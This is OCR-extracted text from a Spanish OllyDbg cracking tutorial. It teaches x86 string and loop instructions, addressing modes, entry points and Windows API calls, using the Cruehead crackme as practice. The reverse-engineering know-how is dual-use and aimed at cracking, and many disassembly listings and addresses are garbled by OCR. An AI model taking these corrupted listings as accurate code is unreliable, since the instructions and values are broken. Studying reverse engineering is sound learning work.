ELLbEJTdUIBAChoOR Ep Bcoia 1 1 1 $ [PP PT] 


E] XOR ECX, ECX 
ADD ECx, 15 


N 
A SHORT CRACKME. 06481007 


ala F NOP 
6a4B1B156 NOP 


Vemos que igual que antes al no ser ECX igual a cero, salta a 401007, pero no solo compara si es cero y 
salta, también vemos que decrementa ECX ya que volvió siendo 14. 


Si traceamos hasta que llega a LOOP pero valiendo ECX igual a cero veremos como se repite el ciclo. 


[O] File View Debug Plugins Options Window Help 


EXE REPESS [LEIT1 


00451 OR ECX, ECX 
a 2 e ECX, 15 


N 
A SHORT CRACKME. 06401007 
NOP 


En el momento que ECX vale cero ya no se repite mas el LOOP y al apretar F7 continua con la ejecución 
de la instrucción subsiguiente. 


[c] File View Debug Plugins Options Window Help 


ae] et] vis slo] 1] +] 1jelmitjwjujc]//k] 


00401000 3309 XOR ECX, ECX 
ADD ECX, 15 
NOP 


NOP 
an SHORT CRACKME. 00461007 


Añ4A1 AHF NAP 


Luego tenemos variaciones de la instrucción LOOP estas son 


e LOOPZ LOOPE realizar un bucle sí es cero 
e LOOPNZ LOOPNE realizar un bucle sí no es cero 


LOOPZ salta o mantiene dentro del bucle mientras que el flag Z sea cero cada vez que se ejecute la 
instrucción LOOP, y la opuesta LOOPNZ mientras que el FLAG Z sea 1, en este tipo de ciclo hay ademas 
contador que se decrementa y se sale por alguna comparación anterior que ponga el FLAG Z a cero en el 
primer caso o a 1 en el segundo o porque ECX llegue a cero por cualquiera de ambos casos. 


INSTRUCCIONES PARA EL MANEJO DE CADENAS de BYTES 

Aquí vemos las mas importantes las aclaramos debajo 

MOVS 

Esta instrucción, lo que hace es mover el contenido de ESI al contenido de EDI, realmente no necesita 


ningún parámetro, pero al escribir en OLLY la instrucción MOVS y apretar ASSEMBLE, la completa 
(innecesariamente) al ensamblar y queda como 


MOVS DWORD PTR ES:[EDI],DWORD PTR DsS:[ESI] 


Allí vemos el ejemplo que escribí 


Eb ll ak aaa 1) Y) 1 $ $ Y Y | 


BE ecsc9o99 TMOU EST. CRACKME- 99493660 
s64aB0 | MOU EDI, CRACKNE- BB4B3eS 
DWORD PTR ES: CEDI], DWORD PTR DS: LESI] 


20 ir 
AA SA PUSH -7A 


Tnicializo antes ESI con la dirección de donde se va a leer o ORIGEN y EDI con el DESTINO o donde se 
copiará 


Podemos mirar en el DUMP el contenido de ambos para ver como va a ser cuando lo ejecute 


En el DUMP puedo hacer GOTO EXPRESIÓN=40366C o bien lo mismo y mas rápido FOLLOW IN 
DUMP- INMEDIATE CONSTANT que mostrara en el dump la constante 40366C 


BE 60364000 RÁ 
EF Scacquaa |MOU EDIS CRACEME, 6 Backup » 

ES Ed DUÓRO FIRES: Leon,  owoR E 

6A 9a Copy 

6S Fázasana | PUSH CAACKNE. B04azara Binar » |, ASCII "No need to disasm 
ES 26048000 | CALL <JHA,AUSERS2. F indllindow y LFindilindowA 

ly 74 01 Undo selection AltHBkSp 

Cl. C3 

C7os MOU DWORD PTR DS:[4920643,408. — Assemble Space 
7||. c705 HOU DWORO PTR DS: [492068], CR 

C7a5 HOU DWORD PTR DS: [49206CJ,0 Label : 

C7a5 HOU DWORD PTR DS:[492070],0 

- fl MOU EAX, DWORD PTR DS:[4826CA Cormment ñ 
e[[- As 24204006 HOU, DUORO PTR DS: [4020741,EA , A 1d! 

z E me = 

A] PUSH ERIX Breakpoint » [pin 5 Nu 

+ ES DIG30000 | CALL -<JMP-RUSERS2.LoadIconA> sl LoadIconA 

5 HOU,_DUORD PTR DS: 14820781, ER Hit trace » 

E [| - $3 aerreeas |PusH RercName = IDC_ARROW 

5 Run trace » (Fis: t= Nu ILL 

+ ES A2030090 FALL Camp. eusERa2.LoadCursor LoadCursorA 

| EZeb SozadGal NOU DuDRD PTR DS: Ede20081; 5. ini pa 
7. c7as coso HOU DWORD PTR Ds: Ede26931:0R New origin here Ctri+Gray ASCII "MENU" 

+ 0765 seza4anÍ MOU DWORD PTR DS:[4620887,CR Goto » | ASCII "No need to disaem 
18 ES ecsioS PUSH CRACKME. 00402064 enlindól33= => FRACKME. ARGA 
al. IS MAS 3 

E Follow in Dump Selection 

NS  cazasaal PUSH DWORD PTR DS: [4820CAJ 

5 EN sl AfeR E Immediate constant 

E Search for 

| É8 Besaccna [PUSH Sana RS 

J040366C=CRACKME. 00403660 (ASCII ”19A”) 


l9A..... 
BO 00 00 ...ooo.. 
BO 00 00 ....oo.o. 
6 600 00 00 En.ooo.. 
DO 00 OOl ...ooo.. 
90 00 BO ...ooo.. 
BO 00 00 | ....oo.o. 
00 00 BOl cono oc 
00 060 BO) .osonons 
A osonons 
90 00 00 ...ooo.. 
BO 00 00 .....o.o. 
BO 00 Ol ...o.oo.o. 
A oboe 
15154515] au e... ..... 


Allí vemos los bytes que apunta ESI o sea los de ORIGEN o que van a ser copiados. 


Y EDI apunta a 


00 00 UB ...ooo.. 
00 00 OOl..oooo.. 
90 00 BDO ...oo... 
BO 00 00 ...oo.o.. 
00 00 OB ...ooo.. 
BO 00 00 ..ooo.o.. 
00 00 OOli..ooo... 
BO 00 DO ....o... 
00 00 00|l...o.oo.. 
00 00 00 ........ 
90 00 OO | ...oo... 

90 00 OO | ....o... Ds 
DO 00 OO ...oo.o.. 


Allí deberían copiarse seria el DESTINO. 


Si apreto F7 hasta que ejecuto el MOVS vemos que se copiaron los 4 bytes. 


DI 
de 
Dm E 


Y 

al 
Moi Y 
Y 

od 


ado 


Ds 
Y 
Y 

oia 


Y 
da 
DO 


aaa 


Nod 
ad 
ISA 

DS 
y Dí 
do 
od 
1 
ra] 


Así mismo como el comando MOVS mueve los 4 bytes o sea el DWORD, tambien existe MOVSW 
(mueve 2 bytes) y MOVSB (mueve un solo byte) en la misma forma que funciona MOVS. 


REP 


Es un prefijo que se agrega a ciertas instrucciones como la anterior y que significa que la instrucción se 
repetirá hasta que ECX sea cero, a la vez que cada vez que se ejecute la instrucción se decrementara ECX 
en uno y aumentaran ESI Y EDI en 4 para apuntar a los siguientes 4 bytes. 

Es muy util para copiar grandes cantidades de memoria de una zona del programa a otra. 


Modifiquemos el caso anterior y agreguémosle el REP 


Eg" YIGYYO LEG DIGO SLI MIA IS 


a] 44 x] EL. cul EE > 1Jejmjriwajc]/[x]8]r]-4s] 19] 


U ESI,CRACKME. 60403650 ASCII "eNamen” 
00401008 Ed 9C364000 nos EDITE OS Bau4B369C ASCII "L9n” 


E2 04000900 U ECX 
F3:B5 Ree MOUS Soworo PTR ES: [EDIJ,DWORD PTR DS: [ESIJ 


NOP 
CALL _<JMP. ¿USERS2.FindllindowA> UFindWindowA 
OR EAX, ERX 


¿ JE SHORT CRACKME. 00401910 
Además modifique la dirección de ORIGEN a 40365C para que copie desde allí, la dirección de destino 
sigue siendo 40369C, voy a la primera línea con NEW ORIGIN HERE y llego apretando F7 hasta el REP 
FUSH LRHLAIF 

PUSH_B 
pBOB4 [decimal 4 


=[0040365 edenéidess 
= [00403690 7I=00416760 


La aclaración del OLLY nos muestra las direcciones de ORIGEN Y DESTINO y los contenidos que 
Copiara, apreto F7 


address ile duro [escu 


Sl EXE: E O 00/ eNameñ. . 
] ÉS $e >4 44|..PrintD 
660 50 00/laA..... 
PA aaa 
BO 00 00 ...oooo. 
BO 00 00 En.oo... 
B90 00 00 | ...oo.o. 
COCA usaba 
00 00 00 /|eNam.... 
DO 00 00 DO ...ooo.. 
a 00 00 DO) .oooo.o.. 


Allí se copiaron los 4 primeros bytes, pero no salimos de la instrucción ya que la misma se repetirá hasta 
que ECX sea cero y vemos que ahora ECX es 3, o sea disminuyo en uno, además ESI y EDI se 
incrementaron en 4, para apuntar a los 4 siguientes bytes. 


Apreto F7 nuevamente 


LOR LED LIADO Y IIS 


NameH. . 
.«PrintD 
lA..... 


Frusan LIRA. VUUMuUCuUE 


PUSH isla 


eNameñ. . 
«»+PrintD 


MOU EDI, CRACKME, 06403690 
MOU ECx,4 
Ea MOUS DWORD PTR ES: C[EDIJ,DWORD PTR DS: [ESI] 


NOP 
CALL <JMP. 2¿USERS2. FindWindowA> UFindilindowA 
OR EAX,ERX 


eNameñ. - 
4 «+PrintD 


Vemos como se copiaron los bytes del ORIGEN al DESTINO y que se repitió 4 veces la operación 
gracias a la instrucción REP. 


Es de aclarar que esta vez, busque una sección de destino con permiso de escritura ya que si no fuera así, 
como en veces anteriores al ejecutar la instrucción nos daría una excepción. 


Además de la instrucción REP existen variantes como REPE o REPZ que repite hasta que el flag Z se 
pone a cero y REPNZ repite hasta que el flag Z no sea cero, o si ECX es cero también sale por cualquiera 
de las dos posibilidades, aunque estas variantes de REP no sirven para el caso de la instrucción MOVS si 
no para otras que veremos a continuación. 


LODS 


Esta instrucción lo que hace es mover los bytes que apunta ESI, o sea su contenido a EAX 


ex] ej] vis] $10] e] + 1]ejmjr[wn]c]/Jk]B/r]-Js] ¿32 
ES Ch DOO MOU ESI,CRACKME. B040365C ASCII "eNamen” 

3640009 Las EnLo Epia O » BB4B3EIC ASCII "eNamen” 

CUA DWORD PTR DS: [ESI] 


39 
El] 


Vemos en este ejemplo que al llegar a LODS (que OLLY escribe como LODS DWORD PTR DsS:[ESI)) 


Y vemos que ESI apunta a 40365C lo cual vemos en la aclaración del OLLY 


Adrdres= | Hex rdumn ASF.TT 


lA..... 


DG 60 00 60 06 BO 00 BA ....o.... 
45 00 00 60 06 60 00 BO E.n...... 


eÑameh. 
00 00 50 72 69 6E 74 44|..PrintD 
00 00 00 09 00 00 00 00 ..ooo... 


DG 60 00 60 06 BO 00 BA ....o.... 


IDANMNDDON 


lastFrr FRANF 


Al ejecutar con F7, vemos que EAX tomo ese valor. 


[3 He view A PIUGIns  UPprtons  vvINGOw Help 


uu] +) 1] ejlmt[wu]c[/x]8]R]-- Js] 31?) 


BE 5C364060 [MOU ESI,CRACKME. 66483650 ASCII "eNamen” 
EF 9C364000 |MOU EDI,CRACKNME. B440369C ASCII "eNamen” 
E2 04000060 |[MOU ECX, 4 

:BD Lia LODOS DWORD PTR DS: [ESI] 


ara Nao 


También a LODS se le puede agregar delante el REP y como en el caso anterior repetirá hasta que ECX 
sea cero, y leerá a partir de ESI los bytes, y los movera a EAX. 


Al llegar a REP LODS 


DO P4CU4gO | FUSA LAHLATIE. DU4wIEO 
A_Ga USH_a 


ECx= ES [decimal 4.) 
EAX=44746E 
DS: [ESIJ= Ebb4ezesc1= 6D614E65 


Address | Hex dun 


Nos muestra los bytes que apunta ESTI y que serán transferidos a EAX si apreto F7 


YuUgulVL1]]. 6H Yu FUSH_Y 
ECX=000060603 [decimal 3.) 
EAX=60614E65 

DS: [ESI]=[004036607-00004165 


Maddrrn er Lara dira nerTTt 


ECX se disminuyo a 3 y ESI se incremento 4 para apuntar a los siguientes 4 bytes que se moverán a EAX 
y así se repite hasta que ECX vale cero y sigue ejecutando la siguiente línea. 


También existen las versiones para copiar 2 bytes LODSW y para copiar 1 byte LODSB 


STOS 


En este caso COPIA al contenido de EDI, el valor que hay en EAX. 


Y) 9] > L]EJMT/M 


BE 5C364060 [MOU ESI, CRACKME. B0403650 
EF 9C364000 |MOU EDI, CRACKME. 6040369C 


E2 40000500 [MOV ECX,4 
BE as DWORD PTR ES: [EDI] 


004B10h: . 68 bososooa | PUSH Sana 
. 62 BBS9B00a | PUSH S0Ba 
004010 . 6A 6E PUSH_6E 
EAR=60614E65 

ES: [EDI J=[0040369C]=6D614E65 


Address [Hex dump_________ las 


Nos muestra EAX y el destino EDI en su contenido se copiaran. 


Al ejecutar 


¡Adaress |Heu_duno —_—_——LESELL] 


60403699165 4E 61 6DJ65 41 BO 00| eNameñ. 


D 6E 7 
00 00 DO 00 00 00 ........ 
00 09 06 06 
00 60 00 00 00 00 .....o.. 
o IP 


a La 
DO: 


Allí se copiaron al DESTINO, también al igual que los casos anteriores se le puede agregar REP delante 
para repetir y existen STOSW y STOSB para copiar dos bytes o un solo byte. 


CMPS 


Compara el contenido de ESI con el contenido de EDI 


Es ra YI vY LILIA U mag > ud > VU MAL y ip 


ex] eu] viles] slo] + 1jejmjtiwjnjc[/[x]a[r]»[s 


BE 5C364006 [MOU ESI,CRACKME. 66403650 

EF 29C364000 [|MOU EDI, CRACKME. 6040369C 

ES a40066bb | MOV ECX, 4 

Br CMPS DWORD PTR DS: [ESIJ,OWORD PTR ES: [EDI] 
31010 20 NOP 
31611 20 NOP 
olsta 2 nOP A 


OLLY la escribe como CMPS DWORD PTR DS:[ESI],DWORD PTR ES:[EDI] 


Si llego traceando con F7 hasta el CMPS la aclaración del OLLY nos muestra lo que va a comparar 


6|]. $68 990300009 | PUSH 3000 
EN. 6A 6E PUSH_6E 
J=[(0040369C]=60614E65 
J1-[(00403650I=60614E65 


Address | Hex dump AS 


Como la comparación en si sabemos que es una resta de ambos y como en mi caso son iguales el 
resultado es cero y activa el FLAGZ 


CUL DU4ISDHYO HOLI 
EIP 60461010 CRAC 


CO ES B023 32bi 
Pi CS B01B 32bi 


BM SS BB23 32bi 
1$j0s 6623 32bi 
FS BB3B 32bi 

un + GS 0006 NULL 
DM LastErr ERRO 
EFL 00000246 | 340, 


STO empty —UNORM 


ST1 empty 0.9 
2T? onntu A A 


En este caso si se puede utilizar REPE o REPZ que comparara hasta que el FLAGZ sea cero o ECX sea 
cero en cualquiera de ambos estados saldrá del REPE. 


eNamen. . 
«»PrintD 
lA..... 
eÑameh. - 
..PrintD 


En mi caso, de anteriores ejemplos había quedado en 40365C y 40369c lo que vemos en mi DUMP. 


Y escribo, poniendo ECX a 10 ya que en todos los casos al llegar ECX a cero teminará la repetición, solo 
que en el caso de REPE, también finalizara según el estado del FLAG Z. 


ELE »)1) visi $0) 9] +) 1Je/mT]wH/c]/]k]8|r]--Js] 58?) 


= EOS MOU ESI, CRACKME. 60403650 ASCII "eNamen” 
364000 |MOU EDI,CRACKME. 6040369C ASCII "eNamen” 
ES Ígsasoss 


mMOU 
DoS CMPS DWORD PTR ES: [EDIJ,DWORD PTR DS: [ESI] 


[5 
E 
E 
a El] 
lr an 


AñRAM1Atd 
Llego hasta el REPE apretando F7 y en mi caso ambos operandos son iguales por lo cual la diferencia 
será cero y se activara el FLAG Z. 

opDI] o 68 Bqoooooa | PUSH 6B4 

BBF (decimal 15.) 


[52] 
J]-[(004036607-00004165 
J1-(004036A07=00004165 


Address |Hex dump ASCII 


Vemos que para REPE si el FLAG Z esta a 1 o sea son iguales no nos saca de la repetición, apreto F7 


Si seguimos apretando llega el momento en que ambos operandos son diferentes 


Aa64A1GAD E 
ECX=000404B6C [decimal 12.) 
DS: [ESI1=[06040366C7=0041676C 
ES: [EDI I=[664036AC7-00000000 


En ese caso al apretar F7 el FLAG Z se pone a 0 y sale de la repetición 


EIP 664B1011 CR 


TO GS BBB NU 


DGA ÓN 

OO LastErr ER 
EFL 0000B206 (MN 
STA enmntu —LINNR 


Si hubiéramos llegado a ECX igual a cero, siempre comparando operandos iguales, en ese caso saldría al 
ser ECX igual a cero también. 


Como habíamos dicho existe también el REPNZ que salta al ser el flag Z igual a 1 o sea cuando en la 
comparación ambos operandos son iguales. 


Creo que con esto hemos hecho un estudio bastante detallado de las instrucciones mas importantes, solo 
dejamos para mas adelante las instrucciones de PUNTO FLOTANTE para no complicar por ahora la 
cosa, espero que lo hayan entendido y que practiquen cada instrucción hasta que sepan bien que hace sin 
dudar. 


MODOS DE DIRECCIONAMIENTO 
DIRECTO: 


Es el modo más comúnmente utilizado, para referirnos a una dirección de memoria, en la instrucción 
escribimos su valor. 


mov dword ptr [00513450], ecx 
mov ax, word ptr [00510A25] 
mov al, byte ptr [00402811] 
CALL 452200 

JMP 421000 


En este caso no tenemos ningún problema de interpretar cual es la dirección de memoria donde el 
programa guardara, moverá, saltara o ejecutara una rutina pues esta a la vista. 


INDIRECTO: 


mov dword ptr [eax], ecx 
CALL EAX 
JMP [ebx + 4] 


Estas instrucciones si las vemos aquí no nos dicen en que dirección se guardaran, o donde saltara o estará 
la rutina del CALL, solo estando parado debuggeando con OLLYDBG justo en esa instrucción y viendo 
los valores que en ese momento tienen los registros, se podrá saber y OLLYDBG nos los mostrara en la 
aclaración cual es la dirección. 


En muchos programa se utiliza el direccionamiento indirecto como una forma de complicar el trabajo del 
cracker ya que el análisis que OLLYDBG hace al inicio del programa, no nos dará información de estas 
instrucciones ya que hasta que no llegue a ejecutarlas no sabrá cual es el valor circunstancial de los 
registros. 


Solo poniendo un BREAKPOINT o llegando traceando hasta alguna de estas instrucciones, en dicho 
punto se sabrá el valor de la dirección, hagamos un ejemplo, reiniciemos el OLLYDBG con el crackme 
de cruehead 


. ES FUVWSO0DOO 

. 6A 81 PUSH 1 

: PUSH A 

. FF75 08 PUSH DWORD PTR SS: [EBP+8] 

. ES SB630000 | CALL <JMP.£USERS32. Inval idateRect> 
> 6 90 PUSH B 

. 64 00 PUSH A 


Allí vemos un PUSH [ebp+8] 

Como estoy en el inicio o ENTRY POINT del programa no se cuanto valdrá EBPcuando llegue a esa 
instrucción, por lo cual no tengo ni idea de que pusheara allí, voy a la línea con GOTO EXPRESION 
401009 y apreto F2 para colocar un BREAKPOINT. 


Luego apreto F9 que es RUN y parara en el BREAKPOINT al pasar por alli. 


ARS 


- 64 81 PUSH 1 
. A 9a PUSH 8 
- FF75 08 PUSH DWORD PTR SS: [EBP+8 
7 : ES Sposaao | DALL. <UNP-RUSERS. Inval idateRect> 
9 > 64 9a PUSH 8 
E . $4 ga PUSH 8 
E - 64 94 PUSH 8 
z - 68 48204909 || PUSH CRACKNME. 90492048 


Allí paro y OLLY en la aclaración nos muestra que en mi maquina EBP+8 es 12FFF8 ya que EBP vale en 
este momento 12FFFO al sumarle 8 dará 12FFF8 en mi maquina, en la suya puede tener otro valor pero 
será igual siempre a EBP+8. 


isters (FPU) 
EAx BBBBBOB1 


ntdll.Kk 


L É É 
A D E 

AD B E 

2 a E 

E] B Y 

TO 6508 

DO 

OB 3s ey c 
ed DO LastErr ERROR_S 

EFL B0B00B202 (NO, NB, 
1eed 


un 
=W 
o 


A empty -??? FFFF 


Stack SS: [O0B12FFFS]1-006401606 (CRACKME. <Modu leEntryPoint >) 


Pa 2 


PUSH [ebp+8] es hacer PUSH el contenido de 12FFF8 si veo en el DUMP dicha posición de memoria 
con GOTO EXPRESIÓN 12FFF8 


Enter expression to follow in ... 
ETE +] 


Cancel 


Y el contenido será 


«o... 


hlnd = 60401000 


pRect = NULL 


5 


e 132. 7C816D4F 


DO 


Y 


End of SEH chain 


El mismo caso se da en cualquier instrucción indirecta solo podemos calcular las direcciones que utilizara 


al estar justo ejecutando dicha instrucción. 


Existen otros Modos de direccionamiento pero en cierta forma ya fueron explicados junto con las 


instrucciones por lo cual no repetiremos ni agregaremos mas nada. 


Creo que el que sobrevivió a todo lo anterior y lo entendió bien tiene grandes probabilidades de éxito en 
el mundo del cracking no sin antes practicar y leer mucho pero, lo anterior es lo básico, a partir de la parte 
9 ya ingresaremos en el apasionante mundo de la practica del cracking, por favor repasen bien las 8 partes 


estas a FULL. 


Hasta la parte 9 
Ricardo Narvaja 
20 de noviembre de 2005 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 9 


Bueno ya hemos terminado de explicar las instrucciones assembler y ahora se nos presenta una 
disyuntiva, por donde seguir, hay muchísimo que aprender y practicar, por lo cual trataremos de ir como 
siempre pasito a pasito, sin apuros usando lo que aprendimos, y agregando mas cosas que faltan aun. 


Por supuesto nuestra primera victima será el famoso CRACKME DE CRUEHEAD pero no nos 
limitaremos solo a ir viendo las distintas formas de crackearlo, si no también que nos iremos ubicando 
con conceptos que luego nos serán básicos a la hora de profundizar en el arte. 


Abramos el famoso crackme en OLLYDBG y orientémonos un poco antes de empezar. 

Veremos en el mismo crackme algunas definiciones que son útiles para cualquier programa. 

ENTRY POINT: Es la primera línea que se ejecuta del programa normalmente, no confundir con OEP 
(Original Entry Point) que es otra cosa que definiremos en partes posteriores de esta introducción, o sea si 


abrimos un programa en OLLYDBG, este para y lo analiza, allí donde termina de analizar y queda 
detenido es el ENTRY POINT del programa. 


aldo] et] vijsil $0) 1] +=) 1 /Ejm)T]w]H] cf /[k/8/R]-s] 5512] 


aa401000) 
Aia 


6A Ba PUSH Y 
ña FFO40099 |CALL <JMP.2¿KERNEL32. GetModu LATE 


E e de [0 PTR DS: [4020CA],El 
3 F4204000 PUSH ERACKNE. BO4B20F4 ASCII "No need to disasm the codet” 
ES AeS4oBoS | CAE Sa 2.USER32.FindWindowA> 


2901 


10115 os 64204901 dE DADES PTR DS: [402064], 4003 
44 C705 63204901 MOV DWORD PTR DS e oenil E WndPr 
Es £C20400 no) EAU PTR DS: [402061 
WORD PTR Ds: EAD20701) E 
Í Enbadada Ed DWORD PTR_DS: [4026CA] 
85 | E PTR DS: [402074], EAX 


Ss. eno. ¡PUSH EAX 


lame = 181 
TIOS 


En nuestro caso del Crackme de Cruehead, el ENTRY POINT será 401000 y OLLYDBG nos muestra en 
el margen inferior que normalmente usa para avisarnos porque esta detenido un programa, que en este 
caso estamos detenidos en el ENTRY POINT. 


06 B0| an 


A KXÁ 
a . 
rogram entry pot 


(9) Explorador de Windows 


Casi todos los programas (el 99 %), cuando arrancan en OLLYDBG se detienen en el ENTRY POINT, 
los que no lo hacen es porque tienen alguna modificación especial realizada para evitar que pare en el 
mismo, ese tipo de trucos veremos mas adelante, pero la idea es saber esto. 


Otro concepto que necesitamos y que usaremos en el de DLLs y sus APIS 


5A 4b PUSH O 
ES FFO40060 [CALL <JMP.SKERNEL32. GetModu leHandleA> 
E a MOU DWORD PTR DS: [4026CA],EAX 


PUSH O 

63 F4204000 |PUSH CRACKME. 004B20F4 ASCII "No need to disasm the codet” 
Es A664006B | CALL <JMP.USERS2.FindWindowA> 

BECO OR EAX, EAX 


MOU DWORD PTR DS: [402064], 4003 

MOU DWORD PTR DS: [402068], CRACKME. ln dPr 
MOU DWORD PTR DS: [49206CJ,0 
de DWORD PTR DS: [4020701,0 
MOU EAX, DWORD PTR DS: [4828CA] 
MOU DWORD PTR DS: [402074], EAX% 
PUSH 64 


RercName = 199. 
PUSH EAX [ni PE NuL L 
LoadIconA 
BO7FOBBA |PUSH 7FOB RercName = IDC_ARROW 
Ba PUSH A (nina: = NULL 
AzoseBB0a CALL <JMP.2USER32.LoadCursorA> LoadCursorA 
70204000 |MOU DWORD PTR DS: [40207C],ERXx 
4020801,5 


MOU DWORD PTR D 
MOU DWORD PTR DS: [402084],CRACKME.06462| ASCII "MENU" 
MOU DWORD PTR DS: [402088],CRACKME. 604621 ASCII "No need to disasm the codet" 


PUSH CRACKNE. 00402064 [guna las = CRACKME. 66492064 
Es F3630008 | CALL <JMP.2USERS2.RegisterClassA> e cd y 

6A 00 PUSH O lParam = NULL 
FF35_CA20400l PUSH DWORD PTR DS: [4626CA] hInst = NULL 


Vemos que en ciertos puntos del programa el mismo nos muestra una CALL o JMP que salta en vez de a 
una dirección como normalmente vimos por ejemplo CALL 401020 o JMP 421367, en la imagen anterior 
vemos que el call por ejemplo es 


CALL LoadIconA 
Y a la derecha nos muestra cierta información, pero que es en este caso LoadlconA? 


El sistema WINDOWS utiliza para evitar que los programadores repitan las mismas rutinas que en casi 
todos los programas son usadas, un sistema de archivos de extensión DLL que son archivos ejecutables, 
pero además tienen la propiedad de tener FUNCIONES DE EXPORTACION O APIS que no son mas 
que funciones que pueden ser utilizadas por cualquier programa, para tener que evitar repetir lo mismo 
en todos los programas. 

Así en este caso llama a la DLL user32.dll y ella tiene una función denominada LoadIconA, que realizara 
cierto trabajo para facilitarme la programación. 


El caso mas sencillo de entender es la api MessageBoxA 


Si en la commandbar del OLLYBD tipeo 


Command ? MessageBoxA 


HEX: TTDSDIEAÁDEC: 2010449130 - ASCII: wÓné 


a 


Program entry point 


Nos muestra la dirección de dicha api, si voy a mirar a dicha dirección en el listado haciendo CLICK 
DERECHO y copiando la dirección que salio en sus maquinas ya que puede variar en cada una. 


MOMIA]. 


19401010/|5 C7es FOU DUORD PTR DS: [492064], 490: 
19491027 6705 MOV DUORD PTA Ds: [402068]; CRACKNE. UndPr 
10491031 205 MOU DWORD PTR DS: 
10491038 Cros 2a20490 NOU DUORO PTR DS:Eda20701:8 
wao1045 ||: fl Axa PTR DS: [4826CA] 
lgetosal|- As 24204en0 OU PuoRo PTR DS: 1402074], EA% 
1940104F || - 6A 64 ReroNane = 199. 
aa1os1[|: sa PUSH Ex [is => NULL 
1401052 |. Diezes6s CALL <JMP.£USER32.LoadIconA> LoadI. 
1481057 || HOJ, DUORO PTR DS: [492878]. E8X 
jqo1osc ||: 68 an7Foaao TDC_ARROW 
11401061||. 6A en PUSH Ó Backup ri 
mánio63/|. ES A2030000 | CALL <yMPA2USE 
Poge1nes[[- AS cczogama (MOM DWORD ETR | Copy » 
10491060|| -  C768 QU DWORD PTR 
1sa1077 ||. C785 OU BUORD PTE. Binary » | 
daeiossl[: 68 Eaaasaod | EUSH CRAEKME e ERRE: aadoaeS 
í ; h 
jo1oso||: ES Fsóspaso | cani me.euse  ASSemble Space sh 
10401095||: A as PUSH O ] h LL 
1401057 ||: FFas cazagaal PUSH DworD PTE Label : m 
10401990||. 6a 08 L 
1M40109F ||. 6A Bl Pl Comment ñ ULL 
setons||: ÉS Gesesase | Push 8808 Breakpoint » [9 cs27es.), 
1040106 
a ES 
y % i 
ta 8 BOBACFO! Hit trace s BUERLEPPED IO MINIMIZEBOX 11 
y (51=74 = rack 
IB4D1BBC Run trace P [need to disasm the codet” 
sesolacall EXA 
y z 
z | Follow Enter 
| New origin here CtriGray* 1 ER 
lddress Origin E 
0402000] 00 06 4b 40 00 Dd DO 00 . : , 
1240200S so 09 08 so|os 08 so 00 Follow in Dump > Previous Mint 
y 201 a 4 40 690/00 0S 64 BB % 
10402018|60 00 60 60/00 06 60 00 Wiew call ree Ctrl+k Next 
194azo20| eg da 88 adas aa 88 09 
> o 
Search for » 
ES a 


Allí tipeo la dirección que en mi maquina apareció 


Enter expression to follow [Xx] 


77d5D4ea y ] 
Cancel | 


USUARIOS DE WINDOWS 98 no hace esto ya verán porque 


OllyDbg - CRACKME.EXE - [CPU - main thread, module PRESO] 
[c] File View Debug AE Eta Window Help 


areExchange 


Allí vemos que pertenece a la dll llamada USER32.dll y que no es mas que una rutina que termina en un 
RET, lo único que nos salva esto es de tener que agregar toda esta rutina en nuestro programa, así se 
hacen programas mas pequeños y se nos facilita la vida a los crackers jeje. 


Si apreto la tecla MENOS volveré al punto donde estaba anteriormente y puedo verificar también que si 


hago GOTO EXPRESIÓN y directamente tipeo MessageBoxA en dicha ventana nos lleva al mismo 
lugar, 


Enter expression to follow [5] 


[MessageBoxA] y 


De Cancel | 


A 
Ep sie eje] l] + 1jefjmjtiwHje 
MOU EDI,EDI 
Ei PUSH _EBP 


a a Da Da Sas Da da das da 


S8BEC 

833D BCO4D? 77 
74 24 

64:A1 13000000 


MOU EBP,ESP 

CMP_ DWORD PTR DS: [77D764BC 
MOU EAX, DWORD PTR FS: [18] 
UN B 


DWORD_PTR_ DS: [EAX+24] 
PUSH USER32.77D70B24 


TEST _EAX,EAX 
MOU DWORD PTR DS: [77D76B20 
PUSH B 


PUSH DWORD PTR SS: [EBP+14] 
PUSH DWORD BIE SS: [EBP+10] 


1,0 


kern 


1,1 


FF7S 6C PUSH DWORD PTR SS: [EBP+C] 
FF7S 68 PUSH DWORD _PTR SS: [EBP+8] 
ES 20000000 


a as Da Das Das Ja la | 


] 5D POP EBP 

z c2 10600 

z 90 NOP 
7705! 90 NOP 


y 
y 
3 
ñ 


Allí vemos la rutina de la api MessageBoxA correspondiente a USER32.dll 


Como verán tuve que tipear MessageBoxA y no messageboxa ya que el nombre de la api es reconocido 
por OLLYDBG si tipeamos en forma correcta sus mayúsculas y minúsculas, y la pregunta siguiente es 
pensar como se como se escribe una api cuales son mayúsculas y minúsculas en su nombre, pues es 
sencillo. 


Volvamos con MENOS al ENTRY POINT 


Haciendo en el listado CLICK DERECHO-SEARCH FOR NAME (label) in CURRENT MODULE nos 
dará la lista de Apis o NAMES utilizadas por este CRACKME DE CRUEHEAD. 


Backup » adPr: 
Copy » 
A Binary a ( rolane = 190, 
hinst = 
ES DigsaaGo [EA Assemble Space Mos 
6s aosFoaoa [PU Label i Aeroliane, = TOC_ARROW 
7] PU (pino: UL 
Es Azozoo00 [CA Comment : LoadCursorA 
os mo 
e Es ; » 
C705 Sacados o Breakpoint 2402 ASCII "MENU" 
C705 S8204001 M0! Hittrace » 34021 ASCII "No need to disasm the codet” 
és escuguna [eu CE E, “ERC. 00402064 
sa 00 PO Runtrace > Pleon ENOLE 
rs ET] 
6A 6n PU Goto » Res ULL 
Es ES E rolaw no SN E 
| Width = s 
6A 6E Pu ON amp 6E (119.) 
és B4oo0B00 [PU DA ARA , 
és aaBBCFOS [PU E 
68 eu | 
E 56 El Find references to Name in all modules | 
Es Ccaseowa [CA .. 


MASA] Wj00] 075 43831 5021 “Yaj NOS MN MOS) VEO VS IE IS SS E HG TA E 


Comment 


664631E4 Import BeginPaint 
B6403230|. ¡data Import «CloseHandle 
06403250|. ¡data Import .CreateToolbar 
6403240 |. ¡data Import .CreateToolbarEx 
B004031E8S |. idata Import CreatellindowExA 
BO4O31EC|.idata Import DefllindowProcA 
Ba403278| . idata Import .DeleteDC 

B6463274|. ¡data Import . De leteObject 
B64B31F0|. idata Import 2,DialogBoxParamA 
664031F4|. ¡data Import DispatchMessageA 
B64031FS|. ¡data Import DrawHMenuBar 
BO4O31FC|. idata Import EndDialog 
B0403270|.idata Import 

BB040326C |. idata Import 

B6403200|. ¡data Import 

606403240|. ¡data Import 

60403204 |. idata Import 

B6403208|. ¡data Import 

BO40320C |. idata Import 

B0403210|.idata Import 

